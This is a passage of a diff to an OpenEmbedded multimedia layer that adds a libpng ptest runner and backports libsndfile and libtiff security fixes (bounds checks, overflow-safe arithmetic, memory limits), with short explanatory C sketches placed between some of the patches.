diff --git a/meta/recipes-multimedia/libpng/files/run-ptest b/meta/recipes-multimedia/libpng/files/run-ptest
new file mode 100644
index 0000000000..9ab5d0c1f4
--- /dev/null
+++ b/meta/recipes-multimedia/libpng/files/run-ptest
@@ -0,0 +1,29 @@
+#!/bin/sh
+
+set -eux
+
+./pngfix pngtest.png > log.txt 2>&1
+
+if grep -i "OK" log.txt 2>&1 ; then
+ echo "PASS: pngfix passed"
+else
+ echo "FAIL: pngfix failed"
+fi
+rm -f log.txt
+
+./pngtest pngtest.png > log.txt 2>&1
+
+if grep -i "PASS" log.txt 2>&1 ; then
+ echo "PASS: pngtest passed"
+else
+ echo "FAIL: pngtest failed"
+fi
+rm -f log.txt
+
+for i in pngstest timepng; do
+ if "./${i}" pngtest.png 2>&1; then
+ echo "PASS: $i"
+ else
+ echo "FAIL: $i"
+ fi
+done
diff --git a/meta/recipes-multimedia/libpng/libpng_1.6.37.bb b/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
index 8c53d11642..9387fc8e2e 100644
--- a/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
+++ b/meta/recipes-multimedia/libpng/libpng_1.6.37.bb
@@ -1,4 +1,7 @@
SUMMARY = "PNG image format decoding library"
+DESCRIPTION = "An open source project to develop and maintain the reference \
+library for use in applications that read, create, and manipulate PNG \
+(Portable Network Graphics) raster image files."
HOMEPAGE = "http://www.libpng.org/"
SECTION = "libs"
LICENSE = "Libpng"
@@ -7,7 +10,10 @@ DEPENDS = "zlib"
LIBV = "16"
-SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BPN}${LIBV}/${BP}.tar.xz"
+SRC_URI = "\
+ ${SOURCEFORGE_MIRROR}/${BPN}/${BPN}${LIBV}/${BP}.tar.xz \
+ file://run-ptest \
+ "
SRC_URI[md5sum] = "015e8e15db1eecde5f2eb9eb5b6e59e9"
SRC_URI[sha256sum] = "505e70834d35383537b6491e7ae8641f1a4bed1876dbfe361201fc80868d88ca"
@@ -17,7 +23,7 @@ UPSTREAM_CHECK_URI = "http://libpng.org/pub/png/libpng.html"
BINCONFIG = "${bindir}/libpng-config ${bindir}/libpng16-config"
-inherit autotools binconfig-disabled pkgconfig
+inherit autotools binconfig-disabled pkgconfig ptest
# Work around missing symbols
EXTRA_OECONF_append_class-target = " ${@bb.utils.contains("TUNE_FEATURES", "neon", "--enable-arm-neon=on", "--enable-arm-neon=off" ,d)}"
@@ -30,3 +36,11 @@ BBCLASSEXTEND = "native nativesdk"
# CVE-2019-17371 is actually a memory leak in gif2png 2.x
CVE_CHECK_WHITELIST += "CVE-2019-17371"
+
+do_install_ptest() {
+ install -m644 "${S}/pngtest.png" "${D}${PTEST_PATH}"
+ install -m755 "${B}/.libs/pngfix" "${D}${PTEST_PATH}"
+ install -m755 "${B}/.libs/pngtest" "${D}${PTEST_PATH}"
+ install -m755 "${B}/.libs/pngstest" "${D}${PTEST_PATH}"
+ install -m755 "${B}/.libs/timepng" "${D}${PTEST_PATH}"
+}
diff --git a/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch b/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch
new file mode 100644
index 0000000000..b42d564b4b
--- /dev/null
+++ b/meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch
@@ -0,0 +1,13 @@
+Index: libsamplerate-0.1.8/configure.ac
+===================================================================
+--- libsamplerate-0.1.8.orig/configure.ac
++++ libsamplerate-0.1.8/configure.ac
+@@ -53,7 +53,7 @@ AC_PROG_LN_S
+ # 6. If any interfaces have been removed since the last public release, then set age
+ # to 0.
+
+-SHARED_VERSION_INFO="1:8:1"
++SHARED_VERSION_INFO="1:9:1"
+
+
+
diff --git a/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb b/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
index ae08189441..8345d6880f 100644
--- a/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
+++ b/meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb
@@ -1,4 +1,5 @@
SUMMARY = "Audio Sample Rate Conversion library"
+DESCRIPTION = "Also known as Secret Rabbit Code - a library for performing sample rate conversion of audio data."
HOMEPAGE = "http://www.mega-nerd.com/SRC/"
SECTION = "libs"
LICENSE = "BSD-2-Clause"
@@ -9,6 +10,7 @@ PR = "r1"
SRC_URI = "http://www.mega-nerd.com/SRC/libsamplerate-${PV}.tar.gz \
file://0001-configure.ac-improve-alsa-handling.patch \
+ file://shared_version_info.patch \
"
SRC_URI[md5sum] = "2b78ae9fe63b36b9fbb6267fad93f259"
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch
new file mode 100644
index 0000000000..6354f856cb
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch
@@ -0,0 +1,36 @@
+From a9815b3f228df00086e0a40bcc43162fc19896a1 Mon Sep 17 00:00:00 2001
+From: bobsayshilol <bobsayshilol@live.co.uk>
+Date: Wed, 17 Feb 2021 23:21:48 +0000
+Subject: [PATCH 1/2] wavlike: Fix incorrect size check
+
+The SF_CART_INFO_16K struct has an additional 4 byte field to hold
+the size of 'tag_text' which the file header doesn't, so don't
+include it as part of the check when looking for the max length.
+
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26026
+
+Upstream-Status: Backport
+CVE: CVE-2021-3246 patch 1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/wavlike.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+Index: libsndfile-1.0.28/src/wavlike.c
+===================================================================
+--- libsndfile-1.0.28.orig/src/wavlike.c
++++ libsndfile-1.0.28/src/wavlike.c
+@@ -803,7 +803,11 @@ wavlike_read_cart_chunk (SF_PRIVATE *psf
+ return 0 ;
+ } ;
+
+- if (chunksize >= sizeof (SF_CART_INFO_16K))
++ /*
++ ** SF_CART_INFO_16K has an extra field 'tag_text_size' that isn't part
++ ** of the chunk, so don't include it in the size check.
++ */
++ if (chunksize >= sizeof (SF_CART_INFO_16K) - 4)
+ { psf_log_printf (psf, "cart : %u too big to be handled\n", chunksize) ;
+ psf_binheader_readf (psf, "j", chunksize) ;
+ return 0 ;
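To illustrate the reasoning in the message above, here is a minimal standalone sketch of the size relationship; the struct and field names are simplified stand-ins, not the actual libsndfile definitions:

    /* The in-memory struct carries a length field that is never written to
     * the file, so the maximum acceptable chunk size is sizeof(struct) - 4. */
    #include <stdio.h>
    #include <stdint.h>

    struct cart_info_16k {              /* stand-in for SF_CART_INFO_16K     */
        char     tag_text[16 * 1024];   /* serialized in the file header     */
        uint32_t tag_text_size;         /* in-memory only, 4 extra bytes     */
    };

    static int chunk_too_big(uint32_t chunksize)
    {   /* compare against the on-disk size, not the full struct size */
        return chunksize >= sizeof(struct cart_info_16k) - sizeof(uint32_t);
    }

    int main(void)
    {
        printf("on-disk limit: %zu bytes\n",
               sizeof(struct cart_info_16k) - sizeof(uint32_t));
        return chunk_too_big(16 * 1024 + 1) ? 0 : 1;
    }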
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch
new file mode 100644
index 0000000000..d6b03d7d4d
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch
@@ -0,0 +1,44 @@
+From deb669ee8be55a94565f6f8a6b60890c2e7c6f32 Mon Sep 17 00:00:00 2001
+From: bobsayshilol <bobsayshilol@live.co.uk>
+Date: Thu, 18 Feb 2021 21:52:09 +0000
+Subject: [PATCH 2/2] ms_adpcm: Fix and extend size checks
+
+'blockalign' is the size of a block, and each block contains 7 samples
+per channel as part of the preamble, so check against 'samplesperblock'
+rather than 'blockalign'. Also add an additional check that the block
+is big enough to hold the samples it claims to hold.
+
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26803
+
+Upstream-Status: Backport
+CVE: CVE-2021-3246 patch 2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/ms_adpcm.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/src/ms_adpcm.c b/src/ms_adpcm.c
+index 5e8f1a31..a21cb994 100644
+--- a/src/ms_adpcm.c
++++ b/src/ms_adpcm.c
+@@ -128,8 +128,14 @@ wavlike_msadpcm_init (SF_PRIVATE *psf, int blockalign, int samplesperblock)
+ if (psf->file.mode == SFM_WRITE)
+ samplesperblock = 2 + 2 * (blockalign - 7 * psf->sf.channels) / psf->sf.channels ;
+
+- if (blockalign < 7 * psf->sf.channels)
+- { psf_log_printf (psf, "*** Error blockalign (%d) should be > %d.\n", blockalign, 7 * psf->sf.channels) ;
++ /* There's 7 samples per channel in the preamble of each block */
++ if (samplesperblock < 7 * psf->sf.channels)
++ { psf_log_printf (psf, "*** Error samplesperblock (%d) should be >= %d.\n", samplesperblock, 7 * psf->sf.channels) ;
++ return SFE_INTERNAL ;
++ } ;
++
++ if (2 * blockalign < samplesperblock * psf->sf.channels)
++ { psf_log_printf (psf, "*** Error blockalign (%d) should be >= %d.\n", blockalign, samplesperblock * psf->sf.channels / 2) ;
+ return SFE_INTERNAL ;
+ } ;
+
+--
+2.25.1
+
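A short worked example of the block layout the new checks rely on; the formula below is the one visible in the SFM_WRITE context line of the hunk, and the concrete numbers are only illustrative:

    /* Each MS ADPCM block starts with a 7-sample-per-channel preamble, so
     * samplesperblock must be at least 7 * channels, and the block itself
     * must be large enough to hold the samples it claims to contain. */
    #include <stdio.h>

    int main(void)
    {
        int channels   = 2;
        int blockalign = 256;   /* bytes per block (illustrative value)      */
        int samplesperblock = 2 + 2 * (blockalign - 7 * channels) / channels;

        if (samplesperblock < 7 * channels)
            return 1;           /* preamble would not fit                    */
        if (2 * blockalign < samplesperblock * channels)
            return 2;           /* block too small for the claimed samples   */

        printf("samplesperblock = %d\n", samplesperblock);  /* prints 244 */
        return 0;
    }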
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch
new file mode 100644
index 0000000000..f7ae82588f
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch
@@ -0,0 +1,30 @@
+From ced91d7b971be6173b604154c39279ce90ad87cc Mon Sep 17 00:00:00 2001
+From: yuan <ssspeed00@gmail.com>
+Date: Tue, 20 Apr 2021 16:16:32 +0800
+Subject: [PATCH] flac: Fix improper buffer reusing (#732)
+
+Upstream-Status: Backport [https://github.com/libsndfile/libsndfile/commit/ced91d7b971be6173b604154c39279ce90ad87cc]
+CVE: CVE-2021-4156
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/flac.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/src/flac.c b/src/flac.c
+index 0be82ac..4fa5cfa 100644
+--- a/src/flac.c
++++ b/src/flac.c
+@@ -952,7 +952,11 @@ flac_read_loop (SF_PRIVATE *psf, unsigned len)
+ /* Decode some more. */
+ while (pflac->pos < pflac->len)
+ { if (FLAC__stream_decoder_process_single (pflac->fsd) == 0)
++ { psf_log_printf (psf, "FLAC__stream_decoder_process_single returned false\n") ;
++ /* Current frame is busted, so NULL the pointer. */
++ pflac->frame = NULL ;
+ break ;
++ } ;
+ state = FLAC__stream_decoder_get_state (pflac->fsd) ;
+ if (state >= FLAC__STREAM_DECODER_END_OF_STREAM)
+ { psf_log_printf (psf, "FLAC__stream_decoder_get_state returned %s\n", FLAC__StreamDecoderStateString [state]) ;
+--
+2.40.1
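The hunk above is small, so here is a sketch of the general pattern it applies, with purely illustrative names rather than the libsndfile internals: when the decode step fails, the cached frame pointer is cleared so later copy code cannot read stale data.

    #include <stdio.h>
    #include <stddef.h>

    struct decoder { const int *frame; int pos; int len; };

    /* stand-in for FLAC__stream_decoder_process_single(); always fails here */
    static int process_single(struct decoder *d) { (void)d; return 0; }

    static void read_loop(struct decoder *d)
    {
        while (d->pos < d->len) {
            if (process_single(d) == 0) {
                fprintf(stderr, "decoder returned false\n");
                d->frame = NULL;      /* current frame is busted, drop it    */
                break;
            }
            d->pos++;
        }
        if (d->frame == NULL)
            return;                   /* nothing valid left to copy from     */
        /* ... copy samples from d->frame here ... */
    }

    int main(void)
    {
        static const int samples[4] = { 1, 2, 3, 4 };
        struct decoder d = { samples, 0, 4 };
        read_loop(&d);
        return 0;
    }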
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch
new file mode 100644
index 0000000000..e22b4e9389
--- /dev/null
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch
@@ -0,0 +1,46 @@
+From 0754562e13d2e63a248a1c82f90b30bc0ffe307c Mon Sep 17 00:00:00 2001
+From: Alex Stewart <alex.stewart@ni.com>
+Date: Tue, 10 Oct 2023 16:10:34 -0400
+Subject: [PATCH] mat4/mat5: fix int overflow in dataend calculation
+
+The clang sanitizer warns of a possible signed integer overflow when
+calculating the `dataend` value in `mat4_read_header()`.
+
+```
+src/mat4.c:323:41: runtime error: signed integer overflow: 205 * -100663296 cannot be represented in type 'int'
+SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/mat4.c:323:41 in
+src/mat4.c:323:48: runtime error: signed integer overflow: 838860800 * 4 cannot be represented in type 'int'
+SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/mat4.c:323:48 in
+```
+
+Cast the offending `rows` and `cols` ints to `sf_count_t` (the type of
+`dataend`) before performing the calculation, to avoid the issue.
+
+CVE: CVE-2022-33065
+Fixes: https://github.com/libsndfile/libsndfile/issues/789
+Fixes: https://github.com/libsndfile/libsndfile/issues/833
+
+Signed-off-by: Alex Stewart <alex.stewart@ni.com>
+
+Upstream-Status: Backport [https://github.com/libsndfile/libsndfile/commit/0754562e13d2e63a248a1c82f90b30bc0ffe307c]
+CVE: CVE-2022-33065
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/mat4.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/mat4.c b/src/mat4.c
+index 3c73680..e2f98b7 100644
+--- a/src/mat4.c
++++ b/src/mat4.c
+@@ -320,7 +320,7 @@ mat4_read_header (SF_PRIVATE *psf)
+ psf->filelength - psf->dataoffset, psf->sf.channels * psf->sf.frames * psf->bytewidth) ;
+ }
+ else if ((psf->filelength - psf->dataoffset) > psf->sf.channels * psf->sf.frames * psf->bytewidth)
+- psf->dataend = psf->dataoffset + rows * cols * psf->bytewidth ;
++ psf->dataend = psf->dataoffset + (sf_count_t) rows * (sf_count_t) cols * psf->bytewidth ;
+
+ psf->datalength = psf->filelength - psf->dataoffset - psf->dataend ;
+
+--
+2.40.1
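The sanitizer traces in the message show plain int multiplications overflowing; the sketch below (illustrative values, with sf_count_t assumed to be a 64-bit type as in libsndfile) shows how widening the operands before the multiply avoids that:

    #include <stdio.h>
    #include <stdint.h>

    typedef int64_t sf_count_t;       /* libsndfile's wide count type        */

    int main(void)
    {
        int rows = 838860800;         /* header-controlled values taken from */
        int cols = 4;                 /* the sanitizer trace above           */
        int bytewidth = 1;

        /* (rows * cols) in int arithmetic would overflow; casting first
         * keeps the whole product in 64-bit arithmetic, as the fix does.    */
        sf_count_t dataend = (sf_count_t) rows * (sf_count_t) cols * bytewidth;

        printf("dataend = %lld\n", (long long) dataend);   /* 3355443200     */
        return 0;
    }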
diff --git a/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb b/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
index b100108766..fb7d94ab75 100644
--- a/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
+++ b/meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb
@@ -1,4 +1,7 @@
SUMMARY = "Audio format Conversion library"
+DESCRIPTION = "Library for reading and writing files containing sampled \
+sound (such as MS Windows WAV and the Apple/SGI AIFF format) through \
+one standard library interface."
HOMEPAGE = "http://www.mega-nerd.com/libsndfile"
AUTHOR = "Erik de Castro Lopo"
DEPENDS = "flac libogg libvorbis"
@@ -17,7 +20,11 @@ SRC_URI = "http://www.mega-nerd.com/libsndfile/files/libsndfile-${PV}.tar.gz \
file://CVE-2017-12562.patch \
file://CVE-2018-19758.patch \
file://CVE-2019-3832.patch \
- "
+ file://CVE-2021-3246_1.patch \
+ file://CVE-2021-3246_2.patch \
+ file://CVE-2022-33065.patch \
+ file://CVE-2021-4156.patch \
+ "
SRC_URI[md5sum] = "646b5f98ce89ac60cdb060fcd398247c"
SRC_URI[sha256sum] = "1ff33929f042fa333aed1e8923aa628c3ee9e1eb85512686c55092d1e5a9dfa9"
diff --git a/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch b/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch
new file mode 100644
index 0000000000..31f867e000
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch
@@ -0,0 +1,52 @@
+From b12a0326e6064b6e0b051d1184a219877472f69b Mon Sep 17 00:00:00 2001
+From: 4ugustus <wangdw.augustus@qq.com>
+Date: Tue, 25 Jan 2022 16:25:28 +0000
+Subject: [PATCH] tiffset: fix global-buffer-overflow for ASCII tags where
+ count is required (fixes #355)
+
+CVE: CVE-2022-22844
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/03047a26952a82daaa0792957ce211e0aa51bc64]
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
+Comments: Add header stdint.h in tiffset.c explicitly for UINT16_MAX
+---
+ tools/tiffset.c | 17 ++++++++++++++---
+ 1 file changed, 14 insertions(+), 3 deletions(-)
+
+diff --git a/tools/tiffset.c b/tools/tiffset.c
+index 8c9e23c5..e7a88c09 100644
+--- a/tools/tiffset.c
++++ b/tools/tiffset.c
+@@ -33,6 +33,7 @@
+ #include <string.h>
+ #include <stdlib.h>
+
++#include <stdint.h>
+ #include "tiffio.h"
+
+ static char* usageMsg[] = {
+@@ -146,9 +146,19 @@ main(int argc, char* argv[])
+
+ arg_index++;
+ if (TIFFFieldDataType(fip) == TIFF_ASCII) {
+- if (TIFFSetField(tiff, TIFFFieldTag(fip), argv[arg_index]) != 1)
+- fprintf( stderr, "Failed to set %s=%s\n",
+- TIFFFieldName(fip), argv[arg_index] );
++ if(TIFFFieldPassCount( fip )) {
++ size_t len;
++ len = strlen(argv[arg_index]) + 1;
++ if (len > UINT16_MAX || TIFFSetField(tiff, TIFFFieldTag(fip),
++ (uint16_t)len, argv[arg_index]) != 1)
++ fprintf( stderr, "Failed to set %s=%s\n",
++ TIFFFieldName(fip), argv[arg_index] );
++ } else {
++ if (TIFFSetField(tiff, TIFFFieldTag(fip),
++ argv[arg_index]) != 1)
++ fprintf( stderr, "Failed to set %s=%s\n",
++ TIFFFieldName(fip), argv[arg_index] );
++ }
+ } else if (TIFFFieldWriteCount(fip) > 0
+ || TIFFFieldWriteCount(fip) == TIFF_VARIABLE) {
+ int ret = 1;
+--
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch b/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
new file mode 100644
index 0000000000..9b4724a325
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,148 @@
+From 02875964eba5c4a2ea98c41562835428214adfe7 Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Sat, 7 Mar 2020 13:21:56 +0100
+Subject: [PATCH] tiff2rgba: output usage to stdout when using -h
+
+also uses std C EXIT_FAILURE / EXIT_SUCCESS
+see #17
+
+Signed-off-by: akash hadke <akash.hadke@kpit.com>
+---
+ tools/tiff2rgba.c | 39 ++++++++++++++++++++++++---------------
+ 1 file changed, 24 insertions(+), 15 deletions(-)
+---
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/02875964eba5c4a2ea98c41562835428214adfe7.patch]
+---
+diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
+index 2eb6f6c4..ef643653 100644
+--- a/tools/tiff2rgba.c
++++ b/tools/tiff2rgba.c
+@@ -39,6 +39,13 @@
+ #include "tiffiop.h"
+ #include "tiffio.h"
+
++#ifndef EXIT_SUCCESS
++#define EXIT_SUCCESS 0
++#endif
++#ifndef EXIT_FAILURE
++#define EXIT_FAILURE 1
++#endif
++
+ #define streq(a,b) (strcmp(a,b) == 0)
+ #define CopyField(tag, v) \
+ if (TIFFGetField(in, tag, &v)) TIFFSetField(out, tag, v)
+@@ -68,7 +75,7 @@ main(int argc, char* argv[])
+ extern char *optarg;
+ #endif
+
+- while ((c = getopt(argc, argv, "c:r:t:bn8")) != -1)
++ while ((c = getopt(argc, argv, "c:r:t:bn8h")) != -1)
+ switch (c) {
+ case 'b':
+ process_by_block = 1;
+@@ -86,7 +93,7 @@ main(int argc, char* argv[])
+ else if (streq(optarg, "zip"))
+ compression = COMPRESSION_DEFLATE;
+ else
+- usage(-1);
++ usage(EXIT_FAILURE);
+ break;
+
+ case 'r':
+@@ -105,17 +112,20 @@ main(int argc, char* argv[])
+ bigtiff_output = 1;
+ break;
+
++ case 'h':
++ usage(EXIT_SUCCESS);
++ /*NOTREACHED*/
+ case '?':
+- usage(0);
++ usage(EXIT_FAILURE);
+ /*NOTREACHED*/
+ }
+
+ if (argc - optind < 2)
+- usage(-1);
++ usage(EXIT_FAILURE);
+
+ out = TIFFOpen(argv[argc-1], bigtiff_output?"w8":"w");
+ if (out == NULL)
+- return (-2);
++ return (EXIT_FAILURE);
+
+ for (; optind < argc-1; optind++) {
+ in = TIFFOpen(argv[optind], "r");
+@@ -132,7 +142,7 @@ main(int argc, char* argv[])
+ }
+ }
+ (void) TIFFClose(out);
+- return (0);
++ return (EXIT_SUCCESS);
+ }
+
+ static int
+@@ -166,7 +176,7 @@ cvt_by_tile( TIFF *in, TIFF *out )
+ if (tile_width != (rastersize / tile_height) / sizeof( uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating raster buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ raster = (uint32*)_TIFFmalloc(rastersize);
+ if (raster == 0) {
+@@ -182,7 +192,7 @@ cvt_by_tile( TIFF *in, TIFF *out )
+ if (tile_width != wrk_linesize / sizeof (uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating wrk_line buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ wrk_line = (uint32*)_TIFFmalloc(wrk_linesize);
+ if (!wrk_line) {
+@@ -279,7 +289,7 @@ cvt_by_strip( TIFF *in, TIFF *out )
+ if (width != (rastersize / rowsperstrip) / sizeof( uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating raster buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ raster = (uint32*)_TIFFmalloc(rastersize);
+ if (raster == 0) {
+@@ -295,7 +305,7 @@ cvt_by_strip( TIFF *in, TIFF *out )
+ if (width != wrk_linesize / sizeof (uint32))
+ {
+ TIFFError(TIFFFileName(in), "Integer overflow when calculating wrk_line buffer");
+- exit(-1);
++ exit(EXIT_FAILURE);
+ }
+ wrk_line = (uint32*)_TIFFmalloc(wrk_linesize);
+ if (!wrk_line) {
+@@ -528,7 +538,7 @@ tiffcvt(TIFF* in, TIFF* out)
+ return( cvt_whole_image( in, out ) );
+ }
+
+-static char* stuff[] = {
++const static char* stuff[] = {
+ "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
+ "where comp is one of the following compression algorithms:",
+ " jpeg\t\tJPEG encoding",
+@@ -547,13 +557,12 @@ static char* stuff[] = {
+ static void
+ usage(int code)
+ {
+- char buf[BUFSIZ];
+ int i;
++ FILE * out = (code == EXIT_SUCCESS) ? stdout : stderr;
+
+- setbuf(stderr, buf);
+- fprintf(stderr, "%s\n\n", TIFFGetVersion());
++ fprintf(out, "%s\n\n", TIFFGetVersion());
+ for (i = 0; stuff[i] != NULL; i++)
+- fprintf(stderr, "%s\n", stuff[i]);
++ fprintf(out, "%s\n", stuff[i]);
+ exit(code);
+ }
+
+--
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch b/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
new file mode 100644
index 0000000000..b6e1842a54
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,27 @@
+From ca70b5e702b9f503333344b2d46691de9feae84e Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sat, 3 Oct 2020 18:16:27 +0200
+Subject: [PATCH] tiff2rgba.c: fix -Wold-style-declaration warning
+
+Signed-off-by: akash hadke <akash.hadke@kpit.com>
+---
+ tools/tiff2rgba.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+---
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/ca70b5e702b9f503333344b2d46691de9feae84e.patch]
+---
+diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
+index ef643653..fbc383aa 100644
+--- a/tools/tiff2rgba.c
++++ b/tools/tiff2rgba.c
+@@ -538,7 +538,7 @@ tiffcvt(TIFF* in, TIFF* out)
+ return( cvt_whole_image( in, out ) );
+ }
+
+-const static char* stuff[] = {
++static const char* stuff[] = {
+ "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
+ "where comp is one of the following compression algorithms:",
+ " jpeg\t\tJPEG encoding",
+--
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch
new file mode 100644
index 0000000000..129721ff3e
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,119 @@
+From 98a254f5b92cea22f5436555ff7fceb12afee84d Mon Sep 17 00:00:00 2001
+From: Thomas Bernard <miniupnp@free.fr>
+Date: Sun, 15 Nov 2020 17:02:51 +0100
+Subject: [PATCH 1/2] enforce (configurable) memory limit in tiff2rgba
+
+fixes #207
+fixes #209
+
+Signed-off-by: akash hadke <akash.hadke@kpit.com>
+---
+ tools/tiff2rgba.c | 25 +++++++++++++++++++++++--
+ 1 file changed, 23 insertions(+), 2 deletions(-)
+---
+CVE: CVE-2020-35521
+CVE: CVE-2020-35522
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/b5a935d96b21cda0f434230cdf8ca958cd8b4eef.patch]
+---
+diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
+index fbc383aa..764395f6 100644
+--- a/tools/tiff2rgba.c
++++ b/tools/tiff2rgba.c
+@@ -60,6 +60,10 @@ uint32 rowsperstrip = (uint32) -1;
+ int process_by_block = 0; /* default is whole image at once */
+ int no_alpha = 0;
+ int bigtiff_output = 0;
++#define DEFAULT_MAX_MALLOC (256 * 1024 * 1024)
++/* malloc size limit (in bytes)
++ * disabled when set to 0 */
++static tmsize_t maxMalloc = DEFAULT_MAX_MALLOC;
+
+
+ static int tiffcvt(TIFF* in, TIFF* out);
+@@ -75,8 +79,11 @@ main(int argc, char* argv[])
+ extern char *optarg;
+ #endif
+
+- while ((c = getopt(argc, argv, "c:r:t:bn8h")) != -1)
++ while ((c = getopt(argc, argv, "c:r:t:bn8hM:")) != -1)
+ switch (c) {
++ case 'M':
++ maxMalloc = (tmsize_t)strtoul(optarg, NULL, 0) << 20;
++ break;
+ case 'b':
+ process_by_block = 1;
+ break;
+@@ -405,6 +412,12 @@ cvt_whole_image( TIFF *in, TIFF *out )
+ (unsigned long)width, (unsigned long)height);
+ return 0;
+ }
++ if (maxMalloc != 0 && (tmsize_t)pixel_count * (tmsize_t)sizeof(uint32) > maxMalloc) {
++ TIFFError(TIFFFileName(in),
++ "Raster size " TIFF_UINT64_FORMAT " over memory limit (" TIFF_UINT64_FORMAT "), try -b option.",
++ (uint64)pixel_count * sizeof(uint32), (uint64)maxMalloc);
++ return 0;
++ }
+
+ rowsperstrip = TIFFDefaultStripSize(out, rowsperstrip);
+ TIFFSetField(out, TIFFTAG_ROWSPERSTRIP, rowsperstrip);
+@@ -530,6 +543,13 @@ tiffcvt(TIFF* in, TIFF* out)
+ TIFFSetField(out, TIFFTAG_SOFTWARE, TIFFGetVersion());
+ CopyField(TIFFTAG_DOCUMENTNAME, stringv);
+
++ if (maxMalloc != 0 && TIFFStripSize(in) > maxMalloc)
++ {
++ TIFFError(TIFFFileName(in),
++ "Strip Size " TIFF_UINT64_FORMAT " over memory limit (" TIFF_UINT64_FORMAT ")",
++ (uint64)TIFFStripSize(in), (uint64)maxMalloc);
++ return 0;
++ }
